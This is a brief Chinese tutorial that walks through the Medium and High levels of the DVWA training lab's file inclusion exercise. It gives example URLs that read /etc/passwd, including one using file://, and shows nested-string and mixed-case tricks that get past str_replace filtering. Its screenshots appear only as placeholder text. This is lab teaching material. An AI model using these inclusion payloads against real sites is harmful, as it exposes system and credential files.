DVWA文件包含漏洞-(中、高绕过)

  1. 一、DVWA SecurityMedium級別
  2. 二、High Security Level

@TOC

一、DVWA SecurityMedium級別

设置好难度后,查看源码:在这里插入图片描述
通过对代码分析可以发现这里过滤了一些东西,即是array里面的因此我们需要进行绕过

绕过方法

  1. 使用绝对路径或相对路径进行绕过,在这里与低级别中路径一致

    1
    http://localhost/DVWA-master/vulnerabilities/fi/?page=/etc/passwd

    在这里插入图片描述

  2. 使用的是 str_replace() 函数,可以使用重写的方式绕过或者是掺入大小写进行绕过

1
2
3
4

1. htthttp://p://
2. http://..././
3. ../

二、High Security Level

查看源码:
在这里插入图片描述
可以看出,报错的条件:

  1. 传出的page中没有file*
  2. $file不等于Include.php

绕过方法:

  1. 可以使用伪协议进行绕过:file://
1
http://localhost/DVWA-master/vulnerabilities/fi/?page=file:///etc/passwd

在这里插入图片描述

page PV:  ・  site PV:  ・  site UV: